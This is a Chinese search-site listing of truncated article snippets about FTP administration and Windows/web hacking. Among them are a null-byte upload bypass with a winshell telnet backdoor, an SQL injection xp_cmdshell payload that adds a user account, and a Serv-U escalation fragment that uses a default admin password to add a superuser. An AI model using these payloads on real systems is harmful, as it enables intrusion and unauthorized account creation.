当前页面位置: » 丰搜网 » 文档中心 » 文档列表 » unix
文件上传是很早以前的事了,最早那会常用的就是ipc连接,然后一个一个的copy,自从动网upfile漏洞出来以后,各种脚本系统如php.jsp下的文件漏洞纷纷暴出,原理都是大同小异,没有过滤文件上传路径,导致可以抓包然后把空格20改成00,变成空字符null,系统是从右往左识别的,所以到空字符那就截断了,更简单的就是过滤文件上传类型不完整,改后缀就可以解决了,这些上传文件的漏洞,用万能上传工具就可以轻松搞定,不过漏洞文件名不同罢了。 还有一些另类的文件上传方法,是在系统做了比较好的防范下完成的,资料来源感谢cd-lion提供一。 先copy个winshell.exe吧,开个telnet端口,命令行下总比在浏览器里方便啊. copymyipc%24toolswinshell.exed:downloadswinzip32已复制一个文件 启动它d:downloadswinzip32...
http://www.sosof.com/detail/139/9251391617824.html -by - 丰搜 缓存页面
windows2000系统的iis5.0提供了ftp服务功能,由于它的简单易用,与windows系统本身结合紧密,深受广大用户的喜爱。但使用iis5.0架设的ftp服务器真的安全吗?它的默认设置其实存在很多安全隐患,很容易成为黑客们的攻击目标。如何让ftp服务器更加安全,只要我们稍加改造,就能做到。 一取消匿名访问功能 默认情况下,windows2000系统的ftp服务器是允许匿名访问的,虽然匿名访问为用户上传、下载文件提供方便,但却存在极大的安全隐患。用户不需要申请合法的账号,就能访问你的ftp服务器,甚至还可以上传、下载文件,特别对于一些存储重要资料的ftp服务器,很容易出现泄密的情况,因此建议用户取消匿名访问功能。 在windows2000系统中,点击“开始→程序→管理工具→internet服务管理器”,弹出管理控制台窗口。然后展开窗口左侧的本地计算机选项,就能看到iis5.0...
http://www.sosof.com/detail/139/3071391619370.html -by - 丰搜 缓存页面
ftp命令是internet用户使用最频繁的命令之一,熟悉并灵活应用ftp的内部命令,可以大大方便使用者,并收到事半功倍之效。如果你想学习使用进行后台ftp下载,那么就必须学习ftp指令。 ftp的命令行格式为: ftp-v-d-i-n-g[主机名],其中 -v显示远程服务器的所有响应信息; -n限制ftp的自动登录,即不使用;.netrc文件; -d使用调试方式; -g取消全局文件名。 ftp使用的内部命令如下(中括号表示可选项): 1.![cmd[args]]:在本地机中执行交互shell,exit回到ftp环境,如:!ls*.zip 2.%24macro-ame[args]:执行宏定义macro-name。 3.account[password]:提供登录远程系统成功后访问系统资源所需的补充口令。 4.appendlocal-file[remote-file]:将本地文件追加到远程系统主...
http://www.sosof.com/detail/139/1281391620450.html -by - 丰搜 缓存页面
在入门篇,我们学会了sql注入的判断方法,但真正要拿到网站的保密内容,是远远不够的。接下来,我们就继续学习如何从数据库中获取想要获得的内容,首先,我们先看看sql注入的一般步骤: 第一节、sql注入的一般步骤 首先,判断环境,寻找注入点,判断数据库类型,这在入门篇已经讲过了。 其次,根据注入参数类型,在脑海中重构sql语句的原貌,按参数类型主要分为下面三种: (a)id=49这类注入的参数是数字型,sql语句原貌大致如下: select*from表名where字段=49 注入的参数为id=49and[查询条件],即是生成语句: select*from表名where字段=49and[查询条件] (b)class=连续剧这类注入的参数是字符型,sql语句原貌大致概如下: select*from表名where字段=’连续剧’ 注入的参数为class=连续剧’and[查询条件]...
http://www.sosof.com/detail/391/801391621377.html -by - 丰搜 缓存页面
看完入门篇和进阶篇后,稍加练习,破解一般的网站是没问题了。但如果碰到表名列名猜不到,或程序作者过滤了一些特殊字符,怎么提高注入的成功率?怎么样提高猜解效率?请大家接着往下看高级篇。 第一节、利用系统表注入sqlserver数据库 sqlserver是一个功能强大的数据库系统,与操作系统也有紧密的联系,这给开发者带来了很大的方便,但另一方面,也为注入者提供了一个跳板,我们先来看看几个具体的例子: ①http://site/url.asp?id=1;execmaster..xp_cmdshell“netusernamepassword/add”-- 分号;在sqlserver中表示隔开前后两句语句,--表示后面的语句为注释,所以,这句语句在sqlserver中将被分成两句执行,先是select出id=1的记录,然后执行存储过程xp_cmdshell,这个存储过程用于调用系统命令,于是,...
http://www.sosof.com/detail/391/111391622054.html -by - 丰搜 缓存页面
随着b/s模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的sqlinjection,即sql注入。 sql注入是从正常的www端口访问,而且表面看起来跟一般的web页面访问没什么区别,所以目前市面的防火墙都不会对sql注入发出警报,如果管理员没查看iis日志的习惯,可能被入侵很长时间都不会发觉。 但是,sql注入的手法相当灵活,在注入的时候会碰到很多意外的情况。能不能根据具体情况进行分析,构造巧妙的sql语句,从而成功获取想要的数据,是高手与“菜鸟”的根本区别。 根据国情,国内的网站用asp+access或sqlserver的...
http://www.sosof.com/detail/139/8021391622652.html -by - 丰搜 缓存页面
适用环境:服务器禁用fso,关掉wscript.shelll,没有执行权限。 限制:没有更改管理员的密码,或者破解出了serv-u的管理员的密码。serv-u默认用户名:localadministrator密码:#@%24ak#.k;0@p下面用mswinsock。winsock建立一个连接,并且以system权限添加超级用户,代码如下: dimrevdata dimsendata setsock=createobject("mswinsock.winsock") sock.protocol=0 sock.connect"127.0.0.1",43958 sendata="localadministrator"&chr(10)&chr(13) sock.senddatasnedata sendata="#@%24ak#.k;0@p"&chr(10)&chr(13) ...
http://www.sosof.com/detail/139/7131391623342.html -by - 丰搜 缓存页面
...
http://www.sosof.com/detail/139/4741391624854.html -by - 丰搜 缓存页面
ftp服务是internet上的标准服务之一,用来在网络上传输文件。在linux系统中,通常用wu-ftpd来实现该服务(www.wu-ftpd.org)。 通常,wu-ftpd提供三种ftp登录形式: 1、anonymous ftp 2、real ftp 3、guest ftp anonymous ftp 应用最广泛的一种ftp,通常,用户以anonymous为用户名,以电子邮件地址为密码进行登录。 real ftp 就是以真实的用户名和密码进行登录,登录以后,用户可以访问整个目录结构。通常认为,real ftp 能对系统安全构成极大威胁,所以,除非万不得以,应尽量避免使用real ftp。 guest ftp 也是real ftp 的一种形式,不同之处在于,一个geust登录后,他就不能访问除宿主目录以外的内容。 在wu-ftpd中,是通过特定的配置文来控制ftp 访问的...
http://www.sosof.com/detail/139/2151391625390.html -by - 丰搜 缓存页面
首先要提到的是这里的内网是指一般我们网吧内部环境的内网,对局域网内网我没什么好说的,愿花钱的去dns0755好了。一个基本条件:一个公网ip,对网关有操作权限。 ftp服务器端192.168.0.100,我选用win2k+serv-u 4.1.0.0,很普通常用的一个组合网关是最简单的双网卡pc,一接外网一接内网,这里假设外网ip为218.4.218.4,内网ip为192.168.0.1。 提一些概念性的东东: 一次完整的ftp会话,包含有两个连接,一个称之为命令通道,一个称之为数据通道。命令通道用来传递一些"命令"和反馈,包括用户名密码登陆,而且众所周知是明文数据通道用来传递实际数据-列目录、文件传输,一旦需要列目录或文件传输,数据通道就会被建立起来,这里分两种方式,一是port二是pasv。 你会在因特网上找到许多ftp服务器,有的要么只支持port,有的要么只支持pasv,有的是因...
http://www.sosof.com/detail/139/9471391625510.html -by - 丰搜 缓存页面
